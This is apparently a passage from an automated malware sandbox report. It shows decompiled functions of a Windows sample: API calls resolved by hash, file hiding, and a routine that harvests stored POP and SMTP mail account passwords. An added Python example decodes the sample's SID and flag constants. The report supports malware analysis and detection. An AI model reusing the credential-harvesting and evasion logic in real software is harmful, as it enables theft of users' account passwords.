                                  				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                                  				return _t4;
                                  			}

                                  APIs
                                  • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                  • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                  • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                  • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%
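Several of the wrappers above hard-code constants whose meaning is the security-relevant point: the SID that E004060BD builds for CheckTokenMembership, the 0x20119 access mask in E00404A52, the wProcessorArchitecture == 9 test in E0040642C and the 0x2006 attribute mask in E0040427D. The following Python is an added example, not code from the report or from the analysed sample, that decodes them: it rebuilds the SID from the stack layout shown in the decompilation (a zero DWORD followed by the WORD 0x0500, then sub-authorities 0x20 and 0x220) and names the bits in the two masks, flagging any bit the table does not explain. The Win32 constant values are the documented SDK ones; the function and table names are this example's own.

```python
"""Decode the hard-coded constants in the hash-resolved API wrappers above.

Added example (not code from the report or from the sample).  It reproduces
the reasoning an analyst applies to E004060BD, E00404A52, E0040642C and
E0040427D: SID bytes as laid out on the stack, and the documented flag
values behind the access and attribute masks.
"""
import struct

# --- SID built by E004060BD -------------------------------------------------

def sid_from_stack_layout(low_dword: int, high_word: int, sub_authorities) -> str:
    """_v20 (DWORD) followed by _v16 (WORD) is the 6-byte SID_IDENTIFIER_AUTHORITY.
    The variables sit little-endian in memory, but the authority value itself is
    big-endian, so bytes 00 00 00 00 00 05 mean authority 5 (SECURITY_NT_AUTHORITY)."""
    authority_bytes = struct.pack("<IH", low_dword, high_word)
    authority = int.from_bytes(authority_bytes, "big")
    return "S-1-" + "-".join(str(x) for x in [authority, *sub_authorities])


# --- bit masks ----------------------------------------------------------------

def decode_mask(value: int, table: dict) -> list:
    """Name every flag from `table` fully contained in `value`.  Bits that no entry
    explains are reported as a hex remainder so nothing is silently dropped."""
    names = []
    covered = 0
    for bit, name in table.items():
        if value & bit == bit:
            names.append(name)
            covered |= bit
    names.sort()
    leftover = value & ~covered
    if leftover:
        names.append(f"unknown:0x{leftover:x}")
    return names


REG_ACCESS = {                       # winnt.h / winreg.h
    0x20019: "KEY_READ",             # STANDARD_RIGHTS_READ | QUERY_VALUE | ENUMERATE_SUB_KEYS | NOTIFY
    0x20006: "KEY_WRITE",
    0x0100:  "KEY_WOW64_64KEY",      # read the native 64-bit view even from a WoW64 process
    0x0200:  "KEY_WOW64_32KEY",
}

FILE_ATTRIBUTES = {                  # winnt.h
    0x0001: "FILE_ATTRIBUTE_READONLY",
    0x0002: "FILE_ATTRIBUTE_HIDDEN",
    0x0004: "FILE_ATTRIBUTE_SYSTEM",
    0x0020: "FILE_ATTRIBUTE_ARCHIVE",
    0x0080: "FILE_ATTRIBUTE_NORMAL",
    0x2000: "FILE_ATTRIBUTE_NOT_CONTENT_INDEXED",
}

PROCESSOR_ARCHITECTURE = {0: "INTEL", 5: "ARM", 6: "IA64", 9: "AMD64", 12: "ARM64", 0xFFFF: "UNKNOWN"}


# --- SYSTEM_INFO test in E0040642C -------------------------------------------

def native_architecture(system_info: bytes) -> str:
    """E0040642C compares the first WORD of the SYSTEM_INFO filled by
    GetNativeSystemInfo (wProcessorArchitecture) against 9 (AMD64)."""
    arch = struct.unpack_from("<H", system_info, 0)[0]
    return PROCESSOR_ARCHITECTURE.get(arch, f"0x{arch:x}")


if __name__ == "__main__":
    print(sid_from_stack_layout(0, 0x500, [0x20, 0x220]))   # the SID from E004060BD
    print(decode_mask(0x20119, REG_ACCESS))                  # mask from E00404A52
    print(decode_mask(0x2006, FILE_ATTRIBUTES))              # mask from E0040427D
    # constructed 36-byte SYSTEM_INFO with wProcessorArchitecture = 9
    print(native_architecture(struct.pack("<H", 9) + bytes(34)))
```

The SID comes out as S-1-5-32-544 (BUILTIN\Administrators), which is what makes E004060BD an "am I admin" check rather than a generic group test; the leftover-bits reporting in decode_mask is there because a mask with an unexplained bit is exactly the case where a quick table lookup would mislead.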

                                  C-Code - Quality: 100%
                                  			E00404A19(void* _a4, short* _a8, void** _a12) {
                                  				long _t5;
                                  				void* _t6;
                                  
                                  				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                                  				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                                  				return _t5;
                                  			}

                                  APIs
                                  • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                  • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                  • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                  • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			/* Reported as FindCloseChangeNotification, but in kernelbase.dll that export shares
                                  			   its address with CloseHandle, so symbolisers pick the first export name for it.
                                  			   This is best read as a CloseHandle wrapper resolved by hash. */
                                  			E00403C40(void* _a4) {
                                  				int _t4;
                                  				void* _t5;
                                  
                                  				E004031E5(_t5, 0, 0xfbce7a42, 0, 0); // kernel32 export resolved by hash
                                  				_t4 = FindCloseChangeNotification(_a4); // executed; same address as CloseHandle
                                  				return _t4;
                                  			}

                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                  • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                  • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                  • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403C08(WCHAR* _a4) {
                                  				int _t4;
                                  				void* _t5;
                                  
                                  				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                                  				_t4 = DeleteFileW(_a4); // executed
                                  				return _t4;
                                  			}

                                  APIs
                                  • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                  • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                  • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                  • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00402C1F(WCHAR* _a4) {
                                  				struct HINSTANCE__* _t4;
                                  				void* _t5;
                                  
                                  				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                                  				_t4 = LoadLibraryW(_a4); // executed
                                  				return _t4;
                                  			}

                                  APIs
                                  • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                  • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                  • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                  • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403BEF(void* _a4) {
                                  				int _t4;
                                  				void* _t5;
                                  
                                  				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                                  				_t4 = FindClose(_a4); // executed
                                  				return _t4;
                                  			}

                                  APIs
                                  • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFind
                                  • String ID:
                                  • API String ID: 1863332320-0
                                  • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                  • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                  • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                  • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403BB7(WCHAR* _a4) {
                                  				long _t4;
                                  				void* _t5;
                                  
                                  				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                                  				_t4 = GetFileAttributesW(_a4); // executed
                                  				return _t4;
                                  			}

                                  APIs
                                  • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                  • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                  • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                  • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004049FF(void* _a4) {
                                  				long _t3;
                                  				void* _t4;
                                  
                                  				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                                  				_t3 = RegCloseKey(_a4); // executed
                                  				return _t3;
                                  			}

                                  APIs
                                  • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                  • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                  • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                  • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403B64(WCHAR* _a4) {
                                  				int _t3;
                                  				void* _t4;
                                  
                                  				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                                  				_t3 = PathFileExistsW(_a4); // executed
                                  				return _t3;
                                  			}

                                  APIs
                                  • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID:
                                  • API String ID: 1174141254-0
                                  • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                  • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                  • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                  • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: closesocket
                                  • String ID:
                                  • API String ID: 2781271927-0
                                  • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                  • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                  • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                  • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403F9E(void* _a4) {
                                  				int _t3;
                                  				void* _t4;
                                  
                                  				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                                  				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                                  				return _t3;
                                  			}

                                  APIs
                                  • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                  • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                  • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                  • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406472(long _a4) {
                                  				void* _t3;
                                  				void* _t4;
                                  
                                  				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                                  				Sleep(_a4); // executed
                                  				return _t3;
                                  			}

                                  APIs
                                  • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                  • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                  • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                  • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405924(WCHAR* _a4, WCHAR* _a8) {
                                  				WCHAR* _t4;
                                  				void* _t5;
                                  
                                  				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                                  				_t4 = StrStrW(_a4, _a8); // executed
                                  				return _t4;
                                  			}

                                  APIs
                                  • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                  • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                  • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                  • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 0040438F
                                  • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                  • VariantInit.OLEAUT32(?), ref: 004043C4
                                  • SysAllocString.OLEAUT32(?), ref: 004043CD
                                  • VariantInit.OLEAUT32(?), ref: 00404414
                                  • SysAllocString.OLEAUT32(?), ref: 00404419
                                  • VariantInit.OLEAUT32(?), ref: 00404431
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: InitVariant$AllocString$CreateInitializeInstance
                                  • String ID:
                                  • API String ID: 1312198159-0
                                  • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                  • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                  • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                  • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				intOrPtr _v40;
                                  				intOrPtr _v44;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr _t40;
                                  				intOrPtr _t45;
                                  				intOrPtr _t47;
                                  				void* _t71;
                                  				void* _t75;
                                  				void* _t77;
                                  
                                  				_t72 = _a4;
                                  				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                                  				_t81 = _t71;
                                  				if(_t71 != 0) {
                                  					_push(__ebx);
                                  					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                                  					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                                  					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                                  					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                                  					_v8 = _v8 & 0x00000000;
                                  					_v20 = _t40;
                                  					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                                  					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                                  					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                                  					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                                  					_v12 = _v12 & 0x00000000;
                                  					_v32 = _t45;
                                  					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                                  					_t77 = _t75 + 0x50;
                                  					_v36 = _t47;
                                  					if(_v8 != 0 || _v12 != 0) {
                                  						E00405872( *0x49f934, _t71, 1, 0);
                                  						E00405872( *0x49f934, _t67, 1, 0);
                                  						_t74 = _v16;
                                  						E00405872( *0x49f934, _v16, 1, 0);
                                  						E00405781( *0x49f934, _v40);
                                  						E00405872( *0x49f934, _v20, 1, 0);
                                  						_push(_v8);
                                  						E00405762(_v16,  *0x49f934, _v24);
                                  						E00405872( *0x49f934, _v28, 1, 0);
                                  						E00405781( *0x49f934, _v44);
                                  						E00405872( *0x49f934, _v32, 1, 0);
                                  						_push(_v12);
                                  						E00405762(_t74,  *0x49f934, _v36);
                                  						_t77 = _t77 + 0x88;
                                  					} else {
                                  						_t74 = _v16;
                                  					}
                                  					E0040471C(_t71);
                                  					E0040471C(_t67);
                                  					E0040471C(_t74);
                                  					E0040471C(_v20);
                                  					E0040471C(_v24);
                                  					E0040471C(_v28);
                                  					E0040471C(_v32);
                                  					E0040471C(_v36);
                                  				}
                                  				return 1;
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                  • API String ID: 0-2111798378
                                  • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                  • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                  • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                  • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E0040317B(intOrPtr _a4) {
                                  				signed int _v8;
                                  				intOrPtr _v12;
                                  				void* __ecx;
                                  				intOrPtr _t17;
                                  				void* _t21;
                                  				intOrPtr* _t23;
                                  				void* _t26;
                                  				void* _t28;
                                  				intOrPtr* _t31;
                                  				void* _t33;
                                  				signed int _t34;
                                  
                                  				_push(_t25);
                                  				_t1 =  &_v8;
                                  				 *_t1 = _v8 & 0x00000000;
                                  				_t34 =  *_t1;
                                  				_v8 =  *[fs:0x30];
                                  				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
                                  				_t31 = _t23;
                                  				do {
                                  					_v12 =  *((intOrPtr*)(_t31 + 0x18));
                                  					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
                                  					_pop(_t26);
                                  					_t35 = _t28;
                                  					if(_t28 == 0) {
                                  						goto L3;
                                  					} else {
                                  						E004032EA(_t35, _t28, 0);
                                  						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
                                  						_t33 = _t33 + 0x14;
                                  						if(_a4 == _t21) {
                                  							_t17 = _v12;
                                  						} else {
                                  							goto L3;
                                  						}
                                  					}
                                  					L5:
                                  					return _t17;
                                  					L3:
                                  					_t31 =  *_t31;
                                  				} while (_t23 != _t31);
                                  				_t17 = 0;
                                  				goto L5;
                                  			}

                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                  • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                  • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                  • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                  Uniqueness

                                  Uniqueness Score: -1.00%